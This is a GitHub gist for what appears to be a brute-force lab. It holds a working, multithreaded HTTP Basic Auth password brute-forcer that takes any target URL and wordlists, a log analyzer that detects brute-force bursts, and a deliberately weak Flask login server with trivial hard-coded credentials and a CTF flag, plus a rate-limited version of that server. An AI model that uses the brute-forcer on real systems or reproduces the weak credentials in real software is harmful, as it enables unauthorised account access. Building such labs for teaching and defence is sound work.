Skip to content

Instantly share code, notes, and snippets.

@Prosen-Ghosh
Last active November 4, 2025 14:04
Show Gist options
  • Select an option

  • Save Prosen-Ghosh/71165df671c0b3f0e82c80c853333015 to your computer and use it in GitHub Desktop.

Select an option

Save Prosen-Ghosh/71165df671c0b3f0e82c80c853333015 to your computer and use it in GitHub Desktop.
import os
import requests
from requests.auth import HTTPBasicAuth
import argparse
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from time import sleep
import logging
requests.packages.urllib3.disable_warnings()
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
class BasicAuthBruteForcer:
def __init__(self, target_url, users_file, passwords_file, threads=5, delay=0):
self.target_url = target_url
# self.users = users_file
# self.passwords = passwords_file
self.threads = threads
self.delay = delay
self.found_credentials = []
self.users = self.load_file(users_file)
self.passwords = self.load_file(passwords_file)
def load_file(self, filepath):
if not os.path.exists(filepath):
raise FileNotFoundError(f"File '{filepath}' does not exist")
if not os.path.isfile(filepath):
raise ValueError(f"'{filepath}' is not a file")
file_size = os.path.getsize(filepath)
if file_size == 0:
raise ValueError(f"File '{filepath}' is empty")
if not os.access(filepath, os.R_OK):
raise PermissionError(f"No read permission for '{filepath}'")
try:
with open(filepath, 'r') as f:
return [line.strip() for line in f if line.strip()]
except Exception as e:
logging.error(f"Error loading file {filepath}: {e}")
sys.exit(1)
def try_credentials(self, username, password):
try:
response = requests.get(
self.target_url,
auth=HTTPBasicAuth(username, password),
timeout=5,
)
if response.status_code == 200:
logging.info(f'[SUCCESS] {username}:{password}')
self.found_credentials.append((username, password))
return True
else:
logging.debug(f'[FAILURE] {username}:{password} - Status Code: {response.status_code}')
return False
except requests.exceptions.RequestException as e:
logging.error(f"Request error for {username}:{password} - {e}")
return False
def run(self):
total_attempts = len(self.users) * len(self.passwords)
logging.info(f'Starting brute-force attack on {self.target_url} with {total_attempts} attempts.')
attempts = 0
with ThreadPoolExecutor(max_workers=self.threads) as executor:
futures = []
for user in self.users:
print(f"[INFO] Trying user: {user}")
for password in self.passwords:
futures.append(
executor.submit(self.try_credentials, user, password)
)
if self.delay > 0:
sleep(self.delay)
for future in as_completed(futures):
attempts += 1
if attempts % 10 == 0:
logging.info(f'Progress: {attempts}/{total_attempts} attempts made.')
logging.info(f"\n{'=' *100}")
logging.info(f"Brute-force attack completed: {len(self.found_credentials)} valid credentials found.")
if self.found_credentials:
logging.info("\nValid credentials:")
for user, pwd in self.found_credentials:
logging.info(f' - {user}:{pwd}')
return self.found_credentials
def main():
parser = argparse.ArgumentParser(description='HTTP Basic Auth Brute-Forcer')
parser.add_argument('-u', '--url', required=True, help='Target URL')
parser.add_argument('-U', '--users', required=True, help='Users wordlist file')
parser.add_argument('-P', '--passwords', required=True, help='Passwords wordlist file')
parser.add_argument('-t', '--threads', type=int, default=5, help='Number of threads')
parser.add_argument('-d', '--delay', type=float, default=0, help='Delay between requests (seconds)')
args = parser.parse_args()
bruteforcer = BasicAuthBruteForcer(
args.url,
args.users,
args.passwords,
args.threads,
args.delay
)
bruteforcer.run()
if __name__ == '__main__':
main()
import re
from collections import defaultdict
from datetime import datetime, timedelta
def analyze_auth_log(log_file, threshold=10, time_window=60):
failures = defaultdict(list)
print(f"[*] Analyzing log file: {log_file}")
print(f"[*] Threshold: {threshold} failures within {time_window} seconds\n")
with open(log_file, 'r') as f:
for line in f:
if 'AUTH_FAILURE' in line:
match = re.search(r'AUTH_FAILURE\|([^|]+)\|([^|]+)\|(.+)', line)
if match:
ip = match.group(1)
username = match.group(2)
timestamp_str = match.group(3)
try:
timestamp = datetime.fromisoformat(timestamp_str)
failures[ip].append((timestamp, username))
except ValueError:
print(f"[!] Invalid timestamp format: {timestamp_str}")
continue
alerts = []
for ip, events in failures.items():
events.sort(key=lambda x: x[0])
for i in range(len(events)):
window_start = events[i][0]
window_end = window_start + timedelta(seconds=time_window)
failures_in_window = [e for e in events if window_start <= e[0] <= window_end]
if len(failures_in_window) >= threshold:
usernames = set([e[1] for e in failures_in_window])
alerts.append({
'ip': ip,
'failure_count': len(failures_in_window),
'time_start': window_start,
'time_end': window_end,
'usernames_tried': usernames
})
break
if alerts:
print(f"[!] ALERT: {len(alerts)} potential brute-force attacks detected:\n")
for alert in alerts:
print(f"[!] IP: {alert['ip']}")
print(f" Failures: {alert['failure_count']}")
print(f" Time window: {alert['time_start']} to {alert['time_end']}")
print(f" Usernames tried: {', '.join(alert['usernames_tried'])}")
print()
else:
print("[*] No brute-force attacks detected.")
return alerts
if __name__ == '__main__':
import sys
if len(sys.argv) < 2:
print("[!] Usage: python detect_bruteforce.py <log_file>")
sys.exit(1)
log_file = sys.argv[1]
analyze_auth_log(log_file)
#!/usr/bin/env python3
from flask import Flask, request, jsonify, Response
import logging
from datetime import datetime
app = Flask(__name__)
# Configure logging
logging.basicConfig(
filename='/var/log/auth.log',
level=logging.INFO,
format='%(asctime)s - %(message)s'
)
VALID_USERS = {
'admin': 'admin123',
'user': 'password',
'test': 'test123',
'root': '123456'
}
def check_auth(username, password):
return VALID_USERS.get(username) == password
def authenticate():
return Response(
'Authentication required', 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'}
)
@app.route('/api/protected', methods=['GET'])
def protected_resource():
auth = request.authorization
if auth:
logging.info(f'AUTH_ATTEMPT|{request.remote_addr}|{auth.username}|{datetime.now().isoformat()}')
if not auth or not check_auth(auth.username, auth.password):
if auth:
logging.info(f'AUTH_FAILURE|{request.remote_addr}|{auth.username}|{datetime.now().isoformat()}')
return authenticate()
logging.info(f'AUTH_SUCCESS|{request.remote_addr}|{auth.username}|{datetime.now().isoformat()}')
return jsonify({
'message': 'Access granted',
'user': auth.username,
'secret': 'FLAG{basic_auth_cracked}'
})
@app.route('/health', methods=['GET'])
def health():
return jsonify({'status': 'ok'})
if __name__ == '__main__':
app.run(
host='0.0.0.0',
port=5001,
debug=False
)
#!/usr/bin/env python3
from flask import Flask, request, jsonify, Response
import logging
from datetime import datetime
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
app = Flask(__name__)
limiter = Limiter(
app=app,
key_func=get_remote_address,
default_limits=["200 per day", "50 per hour"],
storage_uri="memory://"
)
# Configure logging
logging.basicConfig(
filename='/var/log/auth.log',
level=logging.INFO,
format='%(asctime)s - %(message)s'
)
VALID_USERS = {
'admin': 'admin123',
'user': 'password',
'test': 'test123',
'root': '123456'
}
def check_auth(username, password):
return VALID_USERS.get(username) == password
def authenticate():
return Response(
'Authentication required', 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'}
)
@app.route('/api/protected', methods=['GET'])
@limiter.limit("10 per minute")
def protected_resource():
auth = request.authorization
if auth:
logging.info(f'AUTH_ATTEMPT|{request.remote_addr}|{auth.username}|{datetime.now().isoformat()}')
if not auth or not check_auth(auth.username, auth.password):
if auth:
logging.info(f'AUTH_FAILURE|{request.remote_addr}|{auth.username}|{datetime.now().isoformat()}')
return authenticate()
logging.info(f'AUTH_SUCCESS|{request.remote_addr}|{auth.username}|{datetime.now().isoformat()}')
return jsonify({
'message': 'Access granted',
'user': auth.username,
'secret': 'FLAG{basic_auth_cracked}'
})
@app.route('/health', methods=['GET'])
def health():
return jsonify({'status': 'ok'})
if __name__ == '__main__':
app.run(
host='0.0.0.0',
port=5001,
debug=False
)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment